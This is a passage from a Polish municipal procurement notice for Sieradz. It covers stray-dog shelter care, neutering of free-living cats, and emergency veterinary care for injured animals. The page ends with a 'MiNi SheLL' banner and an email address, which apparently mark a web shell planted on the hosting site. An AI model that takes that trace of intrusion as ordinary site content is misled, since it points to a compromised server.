bezzwłoczne skontaktowanie się z właścicielem psa w przypadku posiadania przez zwierzę czipa lub innego identyfikatora,-	podejmowanie działań w celu odnalezienia właściciela wyłapanego psa we współpracy z Referatem Ekologii i Ochrony Środowiska Urzędu Miasta Sieradza oraz z lokalnymi organizacjami pozarządowymi, prowadzącymi w ramach swojej działalności statutowej działania w zakresie ochrony zwierząt,-	przekazanie psa właścicielowi najpóźniej w ciągu 24 h od momentu dostarczenia psa do schroniska,-	założenie i prowadzenie ewidencji wyłapanych psów, -	przeprowadzenie badania klinicznego,-	zaczipowanie każdego psa nieposiadającego czipa w terminie nieprzekraczającym 5 h od momentu jego dostarczenia do schroniska;b) utrzymywanie psów wyłapanych z terenu miasta Sieradza w schronisku przez okres obowiązywania umowy, jednakże nie dłużej niż do czasu ich odebrania przez właściciela, zaadoptowania lub upadku ostatniego z przetrzymywanych psów, w tym:o	zapewnienie opieki nad psami w schronisku, przy czym opieka ta odbywać się musi z zachowaniem następujących zasad:-	w schronisku nie powinno przebywać jednorazowo więcej niż 900 zwierząt,-	schronisko winno posiadać minimum 5 wybiegów oraz zapewniać zwierzętom spacery,-	w boksach przeznaczonych dla psów z terenu Miasta Sieradza nie może przebywać jednorazowo więcej niż 2 psy,-	psy muszą być umieszczone w boksach, które zapewniają im możliwość swobodnego przemieszczania się, ochronę przed negatywnym wpływem warunków atmosferycznych i odpowiednie oświetlenie,-	psy agresywne muszą być oddzielone od psów nieposiadających takich cech,-	psy i suki niepoddane zabiegowi sterylizacji muszą być ulokowane w pojedynczych boksach; dopuszcza się umieszczenie ich z drugim psem wysterylizowanym,-	szczeniaki muszą być oddzielone od psów dorosłych, za wyjątkiem umieszczenia szczeniaków z matką,-	każdy kojec musi być opisany w celu umożliwienia identyfikacji psa, który jest przypisany w dokumentacji schroniska do danego boksu,-	należy dobierać psy w boksach tak, by zminimalizować ryzyko pogryzień,-	psy muszą otrzymywać odpowiednią ilość odpowiedniej karmy oraz mieć całodobowy dostęp do świeżej wody pitnej,-	poza wykwalifikowanym personelem pomoc w wyprowadzaniu psów na spacer może być sprawowana przez wolontariuszy, w szczególności z współpracujących ze schroniskiem organizacji pozarządowych działających w zakresie ochrony zwierząt,-	schronisko w porozumieniu z upoważnionym pracownikiem Referatu Ekologii i Ochrony Środowiska Urzędu Miasta Sieradza może przekazać psa, który ma problemy z adaptacją w schronisku lub problemy behawioralne, czasowo (na okres nie dłuższy niż pół roku) do domu tymczasowego,o	zapewnienie opieki weterynaryjnej nad psami w schronisku, przy czym opieka ta odbywać się musi z zachowaniem następujących zasad:-	schronisko przeprowadza prewencyjną 14-dniową kwarantannę po upływie 24 h od momentu dostarczenia psa do schroniska,-	psy mają wykonywane niezbędne szczepienia przeciwko chorobom zakaźnym, w tym wściekliźnie,-	schronisko zapewnia wykonywanie profilaktyki leczniczej i leczenia,-	schronisko przeprowadza obserwację psa, co do którego istnieje podejrzenie o zarażenie wścieklizną, po ugryzieniu człowieka lub zwierzęcia,-	schronisko prowadzi profilaktykę oraz zwalcza pasożyty wewnętrzne i zewnętrzne,-	schronisko zapewnia całodobowy dyżur weterynaryjny,-	schronisko zobowiązane jest do przeprowadzania usypiania ślepych miotów, wykonywania sterylizacji aborcyjnych i w szczególnych przypadkach eutanazji (nieuleczalnie chorych i cierpiących psów, wobec których nie ma możliwości zastosowania skutecznego leczenia) w uzgodnieniu z upoważnionym pracownikiem Referatu Ekologii i Ochrony Środowiska Urzędu Miasta Sieradza oraz z lekarzem weterynarii,-	schronisko przeprowadza kastrację i sterylizację każdego z nowo przybyłych psów w terminie nie krótszym niż 14 dni od daty dostarczenia zwierzęcia do schroniska i nie dłuższym niż 30 dni od momentu dostarczenia do schroniska, chyba że istnieją przeciwwskazania określone przez lekarza weterynarii lub istnieje prawdopodobieństwo odbioru psa przez właściciela,-	schronisko zobowiązane jest dbać o wygląd zewnętrzny psa, w tym o pielęgnację sierści,-	schronisko zapewnia socjalizację psów,o	współpraca z Referatem Ekologii i Ochrony Środowiska Urzędu Miasta Sieradza oraz z lokalnymi organizacjami pozarządowymi, prowadzącymi w ramach swojej działalności statutowej działania w zakresie ochrony zwierząt w zakresie działań mających na celu odnajdywanie właścicieli zwierząt oraz adopcję i promocję opieki nad zwierzętami poprzez:-	zamieszczanie na prowadzonych przez siebie stronach, portalach internetowych, kontach na serwisach społecznościowych i ogłoszeniowych ogłoszeń, informacji dotyczących nowoprzybyłych zwierząt z podaniem miejsca wyłapania zwierzęcia,-	systematyczne umieszczanie zdjęć i danych zwierząt przebywających w schronisku na prowadzonej stronie internetowej oraz na stronie fanpage Wykonawcy prowadzonej w ramach serwisu społecznościowego Facebook,-	poszukiwanie chętnych do zaadoptowania zwierząt,-	przeprowadzanie adopcji zwierząt we współpracy z upoważnionymi przedstawicielami Zamawiającego,-	przeprowadzanie wizyty przed i po adopcyjnych,-	uczestnictwo w akcjach promujących adopcje organizowanych przez Zamawiającego,-	nawiązywanie współpracy z fundacjami i stowarzyszeniami w zakresie promocji i adopcji zwierząt.o	sporządzanie i przekazywanie Zamawiającemu miesięcznych sprawozdań i zestawień psów z terenu gminy Miasta Sieradza przebywających w schronisku, wyłapanych, oddanych właścicielowi, przekazanych do adopcji, poddanych eutanazji, padłych, poddanych sterylizacji i kastracji. c) transport psów odebranych z dotychczasowego schroniska do schroniska docelowego Wykonawcy:transport bezdomnych psów (około 50 szt.) znajdujących się obecnie w schronisku: Przytulisko i Hotel Dla Zwierząt Domowych "FUNNY PETS", 98-200 Sieradz Czartki 49B, do schroniska prowadzonego przez Wykonawcę - w terminie 3 dni od daty zawarcia umowy.2. Chipy zapewnia Wykonawca.3. Dokumentacja przetargowa oraz oferta Wykonawcy wraz z formularzem cenowym stanowią integralną część niniejszej umowy.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>85210000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">łączna cena ofertowa brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">odległość od siedziby Zamawiającego do schroniska</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">warunki lokalowe</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>sterylizacja kotek i kastracja kocurów wolno żyjących</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia jest sterylizacja kotek (maksymalnie 40 szt.) i kastracja kocurów (maksymalnie 15 szt.) wolno żyjących wraz z czipowaniem, w tym:a) przybycie na miejsce wskazane przez przedstawiciela Zamawiającego, w którym przebywają tymczasowo koty wolno żyjące i ich zabranie do gabinetu weterynaryjnego, w którym wykonywane będą zabiegi; przyjazd i zabranie kota do gabinetu powinny nastąpić w terminie nie dłuższym niż 1 dzień od daty zgłoszenia przez Zamawiającego. Wykonawca będzie zobowiązany przez Zamawiającego do przyjazdu, gdy do odbioru będzie co najmniej 1 kot,b) wykonania zabiegów sterylizacji kotek i kastracji kotów wolno żyjących z odrobaczeniem, odpchleniem, wszczepieniem czipa oraz dwudniowym okresem rekonwalescencji po zabiegu; dotyczy również kotek i kocurów wolno żyjących dostarczonych do gabinetu przez osoby trzecie; po wykonaniu zabiegu i okresie rekonwalescencji koty należy przetransportować w miejsce, z którego zostały zabrane,d) prowadzenia ewidencji osób, które dostarczyły kotki lub kocury do sterylizacji i kastracji,e) prowadzenia ewidencji ilości wykonanych zabiegów,f) zapewnienia jak najlepszych warunków przechowywania kotów w gabinecie, tj. przetrzymywania w klatkach odpowiednio przystosowanych i zapewniających komfort poruszania się zwierzęcia,g) miejsce wykonywania zabiegów może być oddalone od miasta Sieradza nie więcej niż 20 km,h) informowanie Zamawiającego o czasie i miejscu zwrotu kota.2. Chipy zapewnia Zamawiający.3. Dokumentacja przetargowa oraz oferta Wykonawcy wraz z formularzem cenowym stanowią integralną część niniejszej umowy.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>85210000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">łączna cena ofertowa brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">odległość od siedziby Zamawiającego do gabinetu wykonującego zabiegi</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>zapewnienie całodobowej opieki weterynaryjnej w przypadku zdarzeń drogowych z udziałem zwierząt</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia jest zapewnienie całodobowej opieki weterynaryjnej w przypadku zdarzeń drogowych z udziałem zwierząt (maksymalnie 30 szt.), w tym:a) przybycie na miejsce (zdarzenia drogowego z udziałem zwierząt, o każdej porze dnia i nocy) wskazane przez przedstawiciela Zamawiającego, także przedstawiciela Straży Miejskiej w Sieradzu lub Policji i zabranie do gabinetu weterynaryjnego zwierzęcia uległego wypadkowi; przyjazd i zabranie zwierzęcia do gabinetu powinno nastąpić możliwie jak najszybciej, w terminie nie dłuższym niż 60 minut od momentu otrzymania zgłoszenia,b) przyjęcie zwierzęcia uległego wypadkowi (o każdej porze dnia i nocy) na drodze przez osobę dostarczającą, po uzgodnieniu z przedstawicielem Zamawiającego lub innym uprawnionym podmiotem,c) wykonania niezbędnych zabiegów i przetrzymanie w gabinecie z trzydniowym okresem rekonwalescencji po udzieleniu pomocy oraz zaczipowanie zwierzęcia,d) prowadzenia ewidencji osób, które dostarczyły zwierzęta ulegle wypadkowi,e) prowadzenia ewidencji wykonanych zabiegów,f) zapewnienia jak najlepszych warunków przechowywania w gabinecie tj. przetrzymywania w klatkach odpowiednio przystosowanych i zapewniających komfort poruszania się zwierzęcia do momentu odebrania ich do miejsca docelowego przetrzymania,g) transport zwierzęcia uległego wypadkowi 4-go dnia od zdarzenia drogowego do schroniska, z którym Zamawiający posiada podpisaną umowę dotyczącą utrzymania psów z terenu Miasta Sieradza lub w inne miejsce wskazane przez Zamawiającego,h) współpraca z wolontariuszami i z lokalną organizacją działającą w zakresie ochrony zwierząt,i) sporządzanie i przekazywanie Zamawiającemu miesięcznych sprawozdań i zestawień zwierząt uległych wypadkom, którym udzielono pomocy z podaniem osoby zgłaszającej zdarzenie drogowe, miejsca zdarzenia, dokładnego opisu zwierzęcia, w tym opisu doznanego urazu.2. Chipy zapewnia Wykonawca.3. Dokumentacja przetargowa oraz oferta Wykonawcy stanowią integralną część niniejszej umowy.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>85210000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">łączna cena ofertowa brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas reakcji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com